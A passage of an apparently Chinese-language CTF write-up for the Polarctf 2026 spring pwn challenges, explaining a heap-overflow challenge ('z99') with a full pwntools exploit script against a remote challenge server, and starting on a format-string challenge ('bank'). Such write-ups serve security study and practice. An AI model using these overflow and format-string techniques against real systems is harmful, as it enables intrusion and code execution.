Polarctf2026春季pwn全解，你能详细讲解吗？

前言(可以不看) 这次的题不是很难，但是这服务器是真不行，靶机经常开不出来，而且有时候平台还炸了，当时写的时候fmt我是只通了本地，远程没通，然后book当时没写出来，其他的都出了，不过canary没去交了(8点一直到8点半都开不了靶机，逗我？)总的来说我还是打的不太好，我的exp都在复现平台打通过，应该还是能参考一下的，不过主要也是学思路。 z99 这个题比较简单，就是创建了四个堆，第一次有堆溢出可以在v4[1]的地方写值，溢出到v5[1]把本来的堆指针覆盖成这个z99的地址，然后在第二次输入的时候就可以往z99改值让他满足条件去getshell了，exp如下： from pwn import * import sys from ctypes import * context.log_level='debug' context.arch='amd64' elf=ELF('./pwn') libc = ELF('./libc.so.6') libc1=cdll.LoadLibrary('./libc.so.6') li='./libc.so.6' flag = 1 if flag: p = remote('1.95.7.68',2067) else: p = process('./pwn') sa = lambda s,n : p.sendafter(s,n) sla = lambda s,n : p.sendlineafter(s,n) sl = lambda s : p.sendline(s) slr = lambda s : p.sendline(str(s)) sd = lambda s : p.send(s) sdr = lambda s : p.send(str(s)) rc = lambda n : p.recv(n) ru = lambda s : p.recvuntil(s) ti = lambda : p.interactive() rcl = lambda : p.recvline() leak = lambda name,addr :log.success(name+"--->"+hex(addr)) u6 = lambda a : u64(rc(a).ljust(8,b'\x00').strip()) i6 = lambda a : int(a,16) def csu(): pay=p64(0)+p64(0)+p64(1) return pay def ph(s): print(hex(s)) def dbg(): # context.terminal = ['tmux', 'splitw', '-h'] gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star' pause() tar=0x60108C pay=p64(tar)*0x40 sl(pay) sl(p64(0x11)) ti() bank 看着比较多但是很简单，就是一个格式化字符串写，因为是32位系统所以把money的地址放前面，测出偏移直接写即可。